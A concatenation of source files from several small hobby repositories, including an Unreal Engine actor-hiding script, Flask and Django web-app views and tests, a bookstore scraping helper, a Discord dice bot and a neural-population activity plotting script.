for i, r in enumerate(edges):
assert len(r.shape) == 2 and r.shape[0] == 2
self._draw_edges(edges=r, color=self.cmap(i))
elif 'tours' in buffer.keys():
tours = buffer['tours']
raise NotImplementedError
else:
ValueError("No 'edges' or 'tours' found in buffer.")
iter_str = f"Iter: {n_iters}, " if n_iters is not None else ''
self.ax.set_title(f"{iter_str}cost: {cost:.4f}, k: {num_tours}")
self.ax.set_aspect('equal', adjustable='box')
self._flush(pause_sec, **kwargs)
def _flush(self, pause_sec: float = 0.1, **kwargs):
self.fig.canvas.draw()
self.fig.canvas.flush_events()
if self.as_gif and self.writer is not None:
self.writer.grab_frame(**kwargs)
else:
plt.pause(pause_sec)
def _draw_edges(self, edges: np.ndarray, color: str = "b", **kwargs):
coords = self.locs[edges]
X = coords[0, :, 0]
Y = coords[0, :, 1]
dX = coords[1, :, 0] - X
dY = coords[1, :, 1] - Y
for x, y, dx, dy in zip(X, Y, dX, dY):
self.ax.arrow(x, y, dx, dy,
color=color,
linestyle='-',
head_width=self.hw,
head_length=self.hl,
length_includes_head=True,
**kwargs)
def render_rgb(self) -> np.ndarray:
"""Returns the current figure as RGB value numpy array."""
return np.frombuffer(self.fig.canvas.tostring_rgb(), dtype=np.uint8)\
.reshape(self.fig.canvas.get_width_height()[::-1] + (3,))
def save(self, path: Optional[str] = None):
"""Save the current figure on specified path. If path is None, uses default save_dir."""
if self.as_gif:
self.writer.finish()
outfile = path if path is not None else os.path.join(self.save_dir, "final.gif")
self.writer.saving(fig=self.fig, outfile=outfile, dpi=120)
return True
return False
def close(self):
"""Finish and clean up figure and writer processing."""
plt.clf()
plt.close('all')
plt.ioff()
#
# ============= #
# ### TEST #### #
# ============= #
def _test():
from torch.utils.data import DataLoader
from lib.routing import RPDataset, RPEnv, GROUPS, TYPES, TW_FRACS
#SAMPLE_CFG = {"groups": GROUPS, "types": TYPES, "tw_fracs": TW_FRACS}
SAMPLE_CFG = {"groups": ['r'], "types": [1], "tw_fracs": [1.0]}
LPATH = "./solomon_stats.pkl"
SMP = 32
N = 100
BS = 16
BS_ = BS
MAX_CON = 5
CUDA = False
SEED = 123
POMO = False #True
N_POMO = 8
if POMO:
BS_ = BS // N_POMO
GIF = False
device = torch.device("cuda" if CUDA else "cpu")
ds = RPDataset(cfg=SAMPLE_CFG, stats_pth=LPATH)
ds.seed(SEED)
data = ds.sample(sample_size=SMP, graph_size=N)
dl = DataLoader(
data,
batch_size=BS_,
collate_fn=lambda x: x, # identity -> returning simple list of instances
shuffle=False
)
env = RPEnv(debug=True,
device=device,
max_concurrent_vehicles=MAX_CON,
k_nbh_frac=0.4,
pomo=POMO,
num_samples=N_POMO,
enable_render=True,
plot_save_dir="./PLOTS" if GIF else None,
)
env.seed(SEED + 1)
for batch in dl:
env.load_data(batch)
obs = env.reset()
done = False
i = 0
start_tws = env._stack_to_tensor(batch, "tw")[:, :, 1]
# print(env.coords[:, 0])
while not done:
# print(i)
# select tour randomly and then select available node with earliest TW
tr = torch.randint(MAX_CON, size=(BS,), device=device)
t_nbh = obs.nbh[torch.arange(BS), tr]
t_msk = obs.nbh_mask[torch.arange(BS), tr]
nd = torch.zeros(BS, dtype=torch.long, device=device)
for j, (nbh, msk, start_tw) in enumerate(zip(t_nbh, t_msk, start_tws)):
available_idx = nbh[~msk] # mask is True where infeasible
idx = available_idx[start_tw[available_idx].argsort(-1, descending=False)]
nd[j] = idx[0]
# step
obs, rew, done, info = env.step(torch.stack((tr, nd), dim=-1))
env.render(as_gif=GIF, pause_sec=0.3)
i += 1
# print(info)
``` |
{
"source": "JoKontage/UnrealScripts",
"score": 2
} |
#### File: JoKontage/UnrealScripts/hide-actors.py
```python
from collections import Counter, defaultdict, OrderedDict
import unreal
import re
import traceback
import os
import json
import csv
import posixpath
import math
from glob import glob
# This is the SCALE / 100 which we set in HammUEr when importing models.
# Source maps are bigger than Sandstorm for whatever reason --
# so we've had to scale things down a bit.
# We *need* this scale to be accurate or the placement of
# objects will be *waaaaay* off if we go by the Origin in
# our imported notes. When spawning an item at the Origin defined
# by an imported note (IE: for nbot_cover notes), we need to
# divide each value (Y, X, Z) by this HAMMUER_SCALE
#
# FYI, the ridiculous number below was found by dividing the location
# specified in a Note actor (IE: 319.99) to the same HammUEr-translated
# point value (IE: 736.116821) in that same object.
# ( *sigh* I hate floats... )
HAMMUER_SCALE = 0.4347000243321434
# REQUIRED! We use the values found in the map.txt files for
# placement of objectives, spawns, ...
GCFSCAPE_EXPORT_DIRECTORY = r"C:\Modding\Source\scripts\exports\doi"
BSPSRC_EXPORT_DIRECTORY = r"C:\Modding\Source\scripts\decompiled_maps"
# Regex for VMF parsing
PLANE_SPLIT_RE = re.compile(r'\((.+?)\)')
ARRAY_RE = re.compile(r'([-0-9.]+)')
THREE_NUM_STR_RE = re.compile(r'^[-0-9.]+ [-0-9.]+ [-0-9.]+$')
# A set of actor labels to use for ensuring we
# don't place the same actor multiple times
PLACED_ACTORS = set()
# Shortcuts for creating material node connections
CREATE_EXPRESSION = unreal.MaterialEditingLibrary.create_material_expression
CREATE_CONNECTION = unreal.MaterialEditingLibrary.connect_material_expressions
CONNECT_PROPERTY = unreal.MaterialEditingLibrary.connect_material_property
CONNECT_EXPRESSIONS = unreal.MaterialEditingLibrary.connect_material_expressions
# Use to create material node connections
CHILD_OBJECT_REGEX = re.compile(r".*_\d{3}$")
def isnumeric(value):
try:
float(value)
return True
except:
return False
def num_to_alpha(num):
""" Convert a number > 0 and < 24 into it's Alphabetic equivalent """
num = int(num) # Ensure num is an int
if num < 0:
raise ValueError("wtf? num_to_alpha doesn't like numbers less than 0...")
if num > 24:
raise ValueError("seriously? there's no way you have more than 24 objectives...")
return chr(65 + num)
def get_snake_case(text):
# If world_name contains CamelCase lettering, add an _
# before each uppercase letter following the first letter
# TODO: This is a stupid way to do this, right? *Maybe* fix it .. but ... it *does* work ...
text = "".join(reversed([c if c.islower() else "_%s" % c for c in reversed(text)]))
# If world_name has a leading underscore, remove it
text = text[1:] if text[0] == "_" else text
# Ensure world_name is lowercase
return text.lower()
def cast(object_to_cast=None, object_class=None):
"""
# object_to_cast: obj unreal.Object : The object you want to cast
# object_class: obj unreal.Class : The class you want to cast the object into
"""
try:
return object_class.cast(object_to_cast)
except Exception:
return None
def get_all_properties(unreal_class=None):
"""
# Note: Also work using the command : help(unreal.StaticMesh)
# unreal_class: obj : The class you want to know the properties
# return: str List : The available properties (formatted the way you can directly use them to get their values)
"""
return unreal.CppLib.get_all_properties(unreal_class)
def get_all_actors(use_selection=False, actor_class=None, actor_tag=None, world=None):
"""
# use_selection: bool : True if you want to get only the selected actors
# actor_class: class unreal.Actor : The class used to filter the actors. Can be None if you do not want to use this filter
# actor_tag: str : The tag used to filter the actors. Can be None if you do not want to use this filter
# world: obj unreal.World : The world you want to get the actors from. If None, will get the actors from the currently open world.
# return: obj List unreal.Actor : The actors
"""
world = world if world is not None else unreal.EditorLevelLibrary.get_editor_world() # Make sure to have a valid world
if use_selection:
selected_actors = get_selected_actors()
class_actors = selected_actors
if actor_class:
class_actors = [x for x in selected_actors if cast(x, actor_class)]
tag_actors = class_actors
if actor_tag:
tag_actors = [x for x in selected_actors if x.actor_has_tag(actor_tag)]
return [x for x in tag_actors]
elif actor_class:
actors = unreal.GameplayStatics.get_all_actors_of_class(world, actor_class)
tag_actors = actors
if actor_tag:
tag_actors = [x for x in actors if x.actor_has_tag(actor_tag)]
return [x for x in tag_actors]
elif actor_tag:
tag_actors = unreal.GameplayStatics.get_all_actors_with_tag(world, actor_tag)
return [x for x in tag_actors]
else:
actors = unreal.GameplayStatics.get_all_actors_of_class(world, unreal.Actor)
return [x for x in actors]
def select_actors(actors_to_select=[]):
"""
# Note: Will always clear the selection before selecting.
# actors_to_select: obj List unreal.Actor : The actors to select.
"""
unreal.EditorLevelLibrary.set_selected_level_actors(actors_to_select)
def get_selected_actors():
""" return: obj List unreal.Actor : The selected actors in the world """
return unreal.EditorLevelLibrary.get_selected_level_actors()
def actor_contains_material(actor, material_name, containing=False):
""" If this actor is StaticMeshActor and contains a material with
a name beginning with any of the words in the provided words_tuple,
return True -- else return False
"""
if not material_name:
return False
if isinstance(actor, unreal.StaticMeshActor):
static_mesh_component = actor.get_component_by_class(unreal.StaticMeshComponent)
# Skip if there's no static mesh to display
if not static_mesh_component.static_mesh:
return False
# Check if the static mesh has materials -- which we'll fix if applicable
mats = static_mesh_component.get_materials()
if not mats:
return False
# Iterate through all materials found in this static mesh
for mat in mats:
if not mat:
continue
# Check if the name of the current material starts with "tools"
mat_name = mat.get_name()
if not mat_name:
continue
if mat_name.startswith(material_name) or (containing and material_name in mat_name):
return True
# Actor wasn't a StaticMesh -- so we couldn't be sure
# it was a tool. Skip this actor ...
return False
def hide_all_actors_with_material_name(material_name, containing=True):
""" Hide all actors with the specified material (with Undo support) """
matching_actors = list()
with unreal.ScopedEditorTransaction("Hiding Actors (in-game) with Specific Mat") as trans:
# Find all actors with the specified material and add them
# to the "matching_actors" list.
for actor in get_all_actors(actor_class=unreal.StaticMeshActor):
if actor_contains_material(actor, material_name, containing=containing):
print(" - hiding actor: %s" % actor.get_name())
# Hide this specified actor in-game
actor.set_actor_hidden_in_game(True)
# Add this actor to our "matching_actors" list
matching_actors.append(actor)
return matching_actors
def move_actors_to_folder(actors, folder_name):
for actor in actors:
if not actor:
continue
try:
actor.set_folder_path(folder_name)
except Exception as ex:
print(ex)
def main():
# Hide all actors with a material name starting with "player_flesh_mat"
# and return a list of all matching actors
matching_actors = hide_all_actors_with_material_name("_flesh_", containing=True)
# Add all actors in the "actors_to_group" list to an Unreal group
with unreal.ScopedEditorTransaction("Group Mannequins"):
useless_actors_group = unreal.ActorGroupingUtils(name="Mannequins")
useless_actors_group.group_actors(matching_actors)
# Move actors to a folder called "Mannequins"
move_actors_to_folder(matching_actors, "Mannequins")
print("[*] We're done! Actors should be hidden in-game")
# Run main!
main()
``` |
{
"source": "J-Okoto/Blog-Quote",
"score": 3
} |
#### File: app/main/views.py
```python
import os
from flask import render_template,request, redirect, url_for, abort,flash
from . import main
from .forms import PostForm
from ..models import Post,Comment
from .. import db
from app.requests import getQuotes
from flask_login import login_required,current_user
# Views
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
quotes=getQuotes()
posts = Post.query.all()
title='Quotes Blog'
return render_template('index.html',title=title,quotes=quotes,posts=posts, current_user=current_user)
@main.route("/new_post", methods=['GET', 'POST'])
@login_required
def new_post():
form = PostForm()
if form.validate_on_submit():
post = Post(title=form.title.data, content=form.content.data,author=current_user)
post.save()
flash('Your post has been created!', 'success')
return redirect(url_for('main.index'))
return render_template('new_post.html', title='New Post',
form=form, legend='New Post')
@main.route("/post/<int:post_id>")
@login_required
def mypost(post_id):
comments = Comment.query.filter_by(post_id=post_id).all()
print(comments)
heading = 'comments'
post = Post.query.get_or_404(post_id)
return render_template('posts.html', title=post.title, post=post, comments=comments, heading=heading)
@main.route('/comment/<post_id>', methods=['Post', 'GET'])
def comment(post_id):
comment = request.form.get('newcomment')
new_comment = Comment(comment=comment, user_id=current_user._get_current_object().id, post_id=post_id)
new_comment.save()
return redirect(url_for('main.mypost', post_id=post_id))
``` |
{
"source": "Jokotoye18/DjangoEcommerce",
"score": 2
} |
#### File: core/templatetags/cart_template_tags.py
```python
from django import template
from core.models import Order
from django.contrib.sessions.models import Session
register = template.Library()
@register.filter
def cart_item_count(user):
if user.is_authenticated:
order_qs = Order.objects.filter(owner=user, is_ordered=False)
if order_qs.exists():
return order_qs[0].items.count()
return 0
``` |
{
"source": "Jokotoye18/Forum",
"score": 2
} |
#### File: boards/api/views.py
```python
from django.shortcuts import get_object_or_404
from django.contrib.auth import get_user_model
from accounts.models import Profile
from boards.models import Board, Topic, Post
from rest_framework.response import Response
from rest_framework.parsers import FormParser
from rest_framework.renderers import TemplateHTMLRenderer
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.views import APIView
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView, ListAPIView, RetrieveUpdateAPIView
from .serializers import BoardSerializer, TopicSerializer, PostSerializer, UserProfileSerializer
class BoardList(ListAPIView):
queryset = Board.objects.all()
serializer_class = BoardSerializer
filter_fields = [
'name',
]
search_fields = [
'name',
]
ordering_fields = [
'name',
]
class BoardDetail(RetrieveUpdateDestroyAPIView):
queryset = Board.objects.all()
serializer_class = BoardSerializer
lookup_field = 'slug'
class BoardTopicList(ListCreateAPIView):
serializer_class = TopicSerializer
lookup_field = 'board__slug'
def get_queryset(self):
queryset = Topic.objects.filter(board__slug=self.kwargs.get('slug'))
return queryset
def post(self, request, *args, **kwargs):
board = get_object_or_404(Board, slug=self.kwargs.get('slug'))
serializer = TopicSerializer(data=request.data)
if serializer.is_valid():
serializer.save(board=board, starter=request.user)
# Post.objects.create(
# topic=request.data.get('topic'),
# subject = request.data.get('subject'),
# created_by = request.user
# )
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class TopicPostList(APIView):
def get(self, request, *args, **kwargs):
subject = Post.objects.filter(topic__slug=self.kwargs.get('topic_slug')).first()
replies = Post.objects.filter(topic__slug=self.kwargs.get('topic_slug'))[1:]
if replies:
subject_serializer = PostSerializer(subject)
replies_serializer = PostSerializer(replies, many=True)
return Response({
'subject': subject_serializer.data,
'replies': replies_serializer.data
})
else:
subject_serializer = PostSerializer(subject)
return Response({
'subject': subject_serializer.data,
'replies': 'No reply yet!'
})
def post(self, request, *args, **kwargs):
topic = get_object_or_404(Topic, slug=self.kwargs.get('topic_slug'))
serializer = PostSerializer(data=request.data)
if serializer.is_valid():
serializer.save(topic=topic, created_by=request.user)
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
class ProfileView(RetrieveUpdateAPIView):
serializer_class = UserProfileSerializer
queryset = Profile.objects.all()
lookup_field = 'user__username'
lookup_url_kwarg = 'username'
# def get(self, request, *args, **kwargs):
# profile = get_object_or_404(Profile, user__username=self.kwargs.get('username'))
# serializer = UserProfileSerializer(profile)
# return Response(serializer.data)
# def patch(self, request, *args, **kwargs):
# profile = get_object_or_404(Profile, user__username=self.kwargs.get('username'))
# serializer = UserProfileSerializer(profile, data=request.data)
# if serializer.is_valid():
# serializer.save()
# return Response(serializer.data, status=status.HTTP_201_CREATED)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
```
#### File: Forum/pages/views.py
```python
from django.shortcuts import render
from django.views.generic import View
from boards.models import Board
from allauth.account.views import password_change
class HomeView(View):
def get(self, *args, **kwargs):
boards = Board.objects.order_by('name')
context = {"board_list": boards}
return render(self.request, "home.html", context)
``` |
{
"source": "Jokotoye18/Learning_log",
"score": 2
} |
#### File: Learning_log/pages/tests.py
```python
from django.test import TestCase, SimpleTestCase
from django.urls import reverse
class HomepageTest(SimpleTestCase):
def test_homepage_status_code(self):
response = self.client.get('/')
self.assertEqual(response.status_code, 200)
def test_homepage_by_url_name(self):
response = self.client.get(reverse('pages:home'))
self.assertEqual(response.status_code, 200)
```
#### File: Learning_log/profiles/models.py
```python
from django.db import models
from allauth.account.forms import SignupForm
from django.contrib.auth import get_user_model
from allauth.account.signals import user_signed_up
class Profile(models.Model):
user = models.OneToOneField(get_user_model(), on_delete=models.CASCADE)
location = models.CharField(max_length=50, blank=True)
interest = models.CharField(max_length=240, blank=True)
about = models.TextField(blank=True)
def __str__(self):
return f"{self.user.username} profile"
User = get_user_model()
def user_signed_up_receiver(request, user, **kwargs):
if user_signed_up:
Profile.objects.create(user=user)
user_signed_up.connect(user_signed_up_receiver, sender=User)
```
#### File: Learning_log/profiles/tests.py
```python
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from.models import Profile
from allauth.account.forms import SignupForm
from django.urls import reverse
class ProfileModelTest(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
email = '<EMAIL>',
username = 'testname'
)
self.profile = Profile.objects.create(
user = self.user,
location = 'ilorin',
interest = 'sport',
about = 'test about'
)
def test_profile_model_text_representation(self):
self.assertEqual(f'{self.profile}', f'{self.user.username} profile')
def test_profile_content(self):
self.assertEqual(f'{self.profile.user}', f'{self.user}')
self.assertEqual(f'{self.profile.location}', 'ilorin')
self.assertEqual(f'{self.profile.interest}', 'sport')
self.assertEqual(f'{self.profile.about}', 'test about')
class ProfileViewTest():
c = Client()
resp = c.get(reverse('profiles:profile'))
```
#### File: Learning_log/profiles/views.py
```python
from django.shortcuts import render, get_object_or_404, redirect
from django.views.generic import DetailView, View,UpdateView
from django.contrib.auth import get_user_model
from django.contrib import messages
from .models import Profile
from .forms import ProfileUpdateForm, UserForm
from django.contrib.auth.mixins import LoginRequiredMixin
class ProfileUpdateView(LoginRequiredMixin, View):
def get(self, request, *args, **kwargs):
form1 = UserForm(instance=request.user)
form2 = ProfileUpdateForm(instance=request.user.profile)
context = {'form1':form1, 'form2':form2}
return render(request, 'profiles/profile.html', context)
def post(self, request, *args, **kwargs):
form1 = UserForm(request.POST, instance=request.user)
form2 = ProfileUpdateForm(request.POST, instance=request.user.profile)
if form1.is_valid() and form2.is_valid():
form1.save()
form2.save()
messages.success(self.request, 'Your account has been updated successfully.')
return redirect("pages:home")
``` |
{
"source": "Jokotoye18/my-portfolio",
"score": 2
} |
#### File: portfolio/api/views.py
```python
from rest_framework.generics import ListAPIView, RetrieveUpdateDestroyAPIView, GenericAPIView, CreateAPIView
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from django.core.mail import send_mail
from django.conf import settings
from .serializers import PortfolioSerializer, ContactSerializer
from portfolio.models import Portfolio
class PortfolioList(ListAPIView):
serializer_class = PortfolioSerializer
queryset = Portfolio.objects.all()
class PortfolioDetail(RetrieveUpdateDestroyAPIView):
serializer_class = PortfolioSerializer
queryset = Portfolio.objects.all()
lookup_field = "slug"
class SendMail(GenericAPIView):
serializer_class = ContactSerializer
def post(self, request, *args, **kwargs ):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
to_email = '<EMAIL>'
sender_email = request.data['email']
name = request.data['name']
message = request.data['message']
subscribe_message = f'Hi <NAME>, {name} has contacted you from your portfolio saying \'{message}\'. You may want to reply to {sender_email}.'
subject = 'Contact message received'
from_email = settings.DEFAULT_FROM_EMAIL
to_email = [to_email]
send_mail(subject, subscribe_message, from_email, to_email, fail_silently=True)
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
# serializer.is_valid(raise_exception=True)
# return Response(serializer.data, status=status.HTTP_201_CREATED)
``` |
{
"source": "Jokotoye18/todoapp",
"score": 3
} |
#### File: todoapp/tests/test_models.py
```python
from django.test import TestCase
from todoapp.models import Todo
from django.contrib.auth import get_user_model
class TodoModelTest(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
username = 'user_test',
email = '<EMAIL>',
password = '<PASSWORD>'
)
self.todo = Todo.objects.create(
owner = self.user,
title = 'Test title'
)
def test_todo_model_text_representation(self):
self.assertEqual(f'{self.todo}', 'Test title')
``` |
{
"source": "Jokotoye18/todo_drf",
"score": 3
} |
#### File: todo/tests/test_models.py
```python
from django.test import TestCase
from todo.models import Todo
from django.contrib.auth import get_user_model
class TodoModelTest(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
username = 'test_user',
email = '<EMAIL>'
)
self.todo = Todo.objects.create(
title = 'Test todo',
added_by = self.user
)
def test_todo_model_content(self):
todo = Todo.objects.get(pk=1)
todos = Todo.objects.count()
self.assertEqual(todos, 1)
self.assertEqual(f'{todo.title}', 'Test todo')
self.assertEqual(todo.added_by, self.user)
def test_todo_model_text_representation(self):
todo = Todo.objects.get(pk=1)
response = f'{todo}'
self.assertEqual(response, 'Test todo')
```
#### File: todo/tests/test_views.py
```python
from django.test import TestCase
from todo.models import Todo
from django.contrib.auth import get_user_model
class TodoViewsTest(TestCase):
def setUp(self):
self.user = get_user_model().objects.create_user(
username = 'test_user2',
email = '<EMAIL>'
)
self.todo = Todo.objects.create(
title = 'Test todo',
added_by = self.user
)
``` |
{
"source": "jokrey/discord-dice-bot",
"score": 3
} |
#### File: jokrey/discord-dice-bot/dice_bot.py
```python
import signal
import discord
import sys
from dice import parse_to_result_str # this is red in pycharm, but it works
if len(sys.argv) >= 2:
BOT_TOKEN = sys.argv[1]
else:
print("Enter Bot Token (you could have entered it as the first command line argument to this script):")
BOT_TOKEN = input()
print("Thanks. All required data for login available. Here we go...")
client = discord.Client()
@client.event
async def on_message(message):
if message.author == client.user: # disable self reply
return
accepted_help_commands = ['help']
accepted_dice_roll_commands = ['', 'würfel!', 'würfel', 'roll-the-dice', 'roll', 'dice', 'dnd']
split = message.content.split(" ",1)
command = split[0].lower()
args = split[1] if len(split) > 1 else ''
if command.startswith('!'):
command = command[1:]
if command in accepted_dice_roll_commands:
try:
result_str = parse_to_result_str(args)
await message.channel.send(result_str)
except:
await message.channel.send('Thanks for trying {0.author.mention}, but that is not is just nothing I can roll. Tried !help?'.format(message))
elif command in accepted_help_commands:
await message.channel.send('Hi {0.author.mention}, you can roll a dice using \"!dice <dice list>\".\n'
'Some possible dice are \"D6, D8, D10, D20\".\n'
'You can also roll multiple of the same dice at once using \"3xD20\"\n'
'Or different dice using \"D20, D2, D4\"\n'
'Also possible is to add a constant to a dice roll using for example \"D6+4\"\n'
'It is also possible to sum or prod the result of a dice roll: \"+3xD4\"'.format(message))
elif command == 'hi':
await message.channel.send('Hi {0.author.mention}, roll a dice?'.format(message))
else:
await message.channel.send('Hi {0.author.mention}, I don\'t recognise your humble request. If you want help, try !help'.format(message))
@client.event
async def on_ready():
print('Bot \"'+client.user.name+'\" logged into discord')
print('Bot User Id: '+str(client.user.id))
print('---beginning operations---')
client.run(BOT_TOKEN)
``` |
{
"source": "jokruger/bookstore-scraping",
"score": 3
} |
#### File: bookstore-scraping/src/tools.py
```python
import logging, requests, time, csv, datetime, os
from src import cache, languages
def init_logging(name):
logFormatter = logging.Formatter('%(asctime)s [%(levelname)s] %(message)s')
rootLogger = logging.getLogger()
fileHandler = logging.FileHandler('scrape.' + name + '.log')
fileHandler.setFormatter(logFormatter)
rootLogger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
rootLogger.setLevel(logging.DEBUG)
def init_wd():
today = datetime.date.today().strftime('%Y-%m-%d')
path = './data/' + today
if not os.path.exists(path):
os.makedirs(path)
return path
@cache.memoize(typed=True, expire=60*60*12)
def get_idx_page(url):
#time.sleep(1)
return requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'})
@cache.memoize(typed=True, expire=60*60*24*28)
def get_page(url):
#time.sleep(1)
return requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'})
def is_year(s):
return len(s) == 4 and s.isdigit()
def make_csv(path):
f = open(path, 'w')
w = csv.writer(f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
w.writerow(['Site', 'Link', 'Name', 'Author', 'Publisher', 'Year', 'Language'])
return w
def save_row(writer, site, link, name, author, publisher, year, language):
writer.writerow([site, link, name, author, publisher, year, language])
def save_book(writer, site, link, name, author, publisher, year, language):
books = 0
records = 0
if name and language:
for l in language.split(','):
save_row(writer, site, link, name, author, publisher, year, l)
records += 1
books += 1
else:
logging.error('unable to process book page: ' + link)
return (books, records)
def parse_language(l):
r = []
ls = l.lower()
if ', ' in ls:
ls = ls.split(', ')
elif ' / ' in ls:
ls = ls.split(' / ')
else:
ls = [ls]
for i in ls:
if i in languages:
r.append(languages[i])
else:
logging.error('unknown language: ' + i)
return ','.join(r)
``` |
{
"source": "joksnet/ludumdare34",
"score": 3
} |
#### File: ludumdare34/grbox/sprites.py
```python
from pygame import Surface, Rect, draw
from pygame.font import SysFont
from pygame.image import load as load_image
from pygame.sprite import Sprite, spritecollide
from random import randint
from .data import imagefruit
class HorizonLine(Sprite):
def __init__(self, color, height=4):
Sprite.__init__(self)
self.image = Surface((640, height))
self.image.fill(color)
self.rect = self.image.get_rect()
self.rect.top = 384
class Box(Sprite):
def __init__(self, color, mass):
Sprite.__init__(self)
self.grow = True
self.color = color
self.size = mass * 10
self.mass = mass
self.image = Surface((self.size, self.size))
self.image.fill(color)
draw.rect(self.image, (0,0,0), (0, 0, self.size, self.size), 1)
self.rect = self.image.get_rect()
self.rect.center = (320, 344)
self.acceleration = 2
self.velocity = 0
self.time = 0
self.vpos = self.rect.top
def set_velocity(self, velocity):
self.acceleration = 2 if velocity else 0
self.velocity = velocity
self.time = 0
self.vpos = self.rect.top
def uplevel(self):
if not self.grow:
return
self.mass += 1
self.size = self.mass * 10
self.image = Surface((self.size, self.size))
self.image.fill(self.color)
draw.rect(self.image, (0,0,0), (0, 0, self.size, self.size), 1)
def update(self, group=None):
collide = spritecollide(self, group, False)
self.rect.width = self.size
self.rect.height = self.size
hit_floor = False
if group and collide:
for sprite in collide:
if type(sprite) is HorizonLine:
hit_floor = True
else:
group.remove(sprite)
self.uplevel()
if self.acceleration:
self.rect.top = self.vpos \
+ (self.velocity * self.time) \
+ (self.acceleration / 2) * (self.time ** 2)
self.time += 1
if hit_floor or not self.acceleration:
self.rect.bottom = 384
self.set_velocity(0)
def draw(self, screen):
screen.blit(self.image, self.rect)
class Dialog(Sprite):
def __init__(self, texts):
Sprite.__init__(self)
width = 0
height = 0
space = 6
between = 3
font = SysFont("monospace", 18)
for text in texts:
f_width, f_height = font.size(text)
height += f_height + between
if f_width > width:
width = f_width
self.image = Surface((width + space * 2, height + space * 2))
self.image.fill((255, 255, 255))
self.rect = self.image.get_rect()
draw.rect(self.image, (0,0,0), self.rect, 1)
top = space
for text in texts:
self.image.blit(font.render(text, 1, (0, 0, 0)), (space, top))
top += font.get_linesize() + between
def update(self, follow):
self.rect.left = follow.rect.right + 6
self.rect.bottom = follow.rect.top - 6
def draw(self, screen):
screen.blit(self.image, self.rect)
class Fruit(Sprite):
VERTICAL = 1
SIDE_WEST = 2
SIDE_EAST = 3
LITTLE = "little"
MEDIUM = "medium"
NORMAL = "normal"
def __init__(self, name, size, direction, position, speed=None):
Sprite.__init__(self)
self.image = load_image(imagefruit(name, size))
self.image.set_colorkey((255, 0, 255))
self.rect = self.image.get_rect()
self.direction = direction
if direction == Fruit.VERTICAL:
self.rect.centerx = position
else:
self.rect.centery = position
if direction == Fruit.SIDE_WEST:
self.rect.left = 640
if not speed:
speed = 1
if name == Fruit.MEDIUM:
speed += 1
if name == Fruit.LITTLE:
speed += 4
self.speed = speed
def update(self):
if self.direction == Fruit.VERTICAL:
self.rect.top += self.speed
elif self.direction == Fruit.SIDE_WEST:
self.rect.left -= self.speed
elif self.direction == Fruit.SIDE_EAST:
self.rect.left += self.speed
class RandomFruit(Fruit):
names = ['apple', 'cherry', 'strawberry']
def __init__(self, size, direction=None, position=None):
name = RandomFruit.names[randint(0, 2)]
if not direction:
direction = randint(1, 3)
if not position:
if direction == Fruit.VERTICAL:
position = randint(8, 632)
else:
position = randint(8, 376)
Fruit.__init__(self, name, size, direction, position)
``` |
{
"source": "jokteur/ASMA",
"score": 2
} |
#### File: plots/final/activity.py
```python
import time
import copy
import os
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.text as mtext
from matplotlib import gridspec
from matplotlib.animation import FuncAnimation
import matplotlib.animation as animation
import matplotlib
import flowrect
from flowrect.simulations.util import calculate_age, calculate_mt, eta_SRM, moving_average
from flowrect.simulations import (
particle_population_nomemory,
ASA1,
quasi_renewal_pde,
)
# params["Gamma"] = params["Gamma"] / params["Lambda"]
def plot_activity(
params,
time_before_input,
ylim,
N,
w=None,
a_cutoff=7,
plot_QR=True,
I_ylim=None,
params_p=None,
plot_I=True,
plot_H=False,
savepath="",
savename="",
save=False,
usetex=False,
figsize=(8, 8),
inset=None,
dpi=None,
title=None,
loc="best",
font_family="serif",
font_size="12",
noshow=False,
):
if usetex:
plt.rc("text", usetex=True)
plt.rc("font", family=font_family, size=font_size)
matplotlib.rcParams["text.latex.preamble"] = [r"\usepackage{amsmath}"]
dt = params["dt"]
I_time = params["I_ext_time"]
base_I = params["base_I"]
I_ext = params["I_ext"]
I_ext_vec = np.concatenate(
(
base_I * np.ones(int(I_time / dt)),
(base_I + I_ext) * np.ones(int((params["time_end"] - I_time) / dt)),
)
)
if not params_p:
params_p = params
# Particle simulation
t = time.time()
ts_P, A, H, _ = particle_population_nomemory(**params_p, N=N)
print(f"Particle simulation done in {time.time()- t:.2f}s")
# ASMA simulation
t = time.time()
(ts_ASMA, a_grid_ASMA, rho_t_ASMA, m_t_ASMA, h_t_ASMA, en_cons_ASMA, A_t_ASMA,) = ASA1(
a_cutoff=a_cutoff,
**params,
)
print(f"ASMA simulation done in {time.time()- t:.2f}s")
ts_QR, h_t_QR, A_t_QR = None, None, None
if plot_QR:
# QR pde
t = time.time()
ts_QR, _, _, h_t_QR, _, A_t_QR = quasi_renewal_pde(
**params,
a_cutoff=a_cutoff,
)
print(f"QR simulation done in {time.time()- t:.2f}s")
begin_idx = int((params["I_ext_time"] - time_before_input) / params["dt"])
begin_P_idx = int((params_p["I_ext_time"] - time_before_input) / params_p["dt"])
num_plots = 1 + int(plot_I) + int(plot_H)
if num_plots == 1:
height_ratios = [1]
elif num_plots == 2:
height_ratios = [5, 1]
else:
height_ratios = [5, 1, 1]
fig = plt.figure(figsize=figsize)
